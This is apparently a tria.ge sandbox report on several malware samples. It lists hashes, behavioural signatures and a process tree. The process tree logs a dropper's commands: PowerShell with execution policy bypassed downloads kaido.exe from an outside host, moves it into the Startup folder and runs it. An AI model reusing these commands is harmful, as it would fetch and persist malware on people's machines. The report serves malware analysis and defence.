Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1007fb7b42fe...35.exe
windows7-x64
107fb7b42fe...35.exe
windows10-2004-x64
84fa565cc2e...af.exe
windows7-x64
14fa565cc2e...af.exe
windows10-2004-x64
3949c262359...70.ps1
windows7-x64
3949c262359...70.ps1
windows10-2004-x64
3b3b66f7e70...62.exe
windows7-x64
10b3b66f7e70...62.exe
windows10-2004-x64
10Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/12/2024, 17:54
Behavioral task
behavioral1
Sample
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe
Resource
win10v2004-20241007-en
General
-
Target
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
-
Size
131KB
-
MD5
17eb8fa4b86a2f5ec5cb789545902181
-
SHA1
cb40cc63b23bc335aa095606c07b56f2d2d71bb9
-
SHA256
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235
-
SHA512
cce3789d6e5395f701c9ff10467c3352568f7a3cea13cfd55e6b6f1bade8f01a56a8c1a433940fa1ccdce201941788717f6d486cef40f59d2bac075eaf696573
-
SSDEEP
1536:j/tSikO5ssRyJmapXRQVO6eWkYolZPt1AUvMFMQiNwRVRky3es:xSWqLQAYolZPt1oJRfky3es
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3000 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2776 wrote to memory of 3004 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 31 PID 2776 wrote to memory of 3004 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 31 PID 2776 wrote to memory of 3004 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 31 PID 3004 wrote to memory of 3000 3004 cmd.exe 32 PID 3004 wrote to memory of 3000 3004 cmd.exe 32 PID 3004 wrote to memory of 3000 3004 cmd.exe 32 PID 2776 wrote to memory of 2572 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 33 PID 2776 wrote to memory of 2572 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 33 PID 2776 wrote to memory of 2572 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 33 PID 2776 wrote to memory of 1528 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 34 PID 2776 wrote to memory of 1528 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 34 PID 2776 wrote to memory of 1528 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 34 PID 2776 wrote to memory of 2692 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 35 PID 2776 wrote to memory of 2692 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 35 PID 2776 wrote to memory of 2692 2776 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe"C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c move x.exe "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/"2⤵PID:2572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cd "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/" && x.exe2⤵PID:2692
-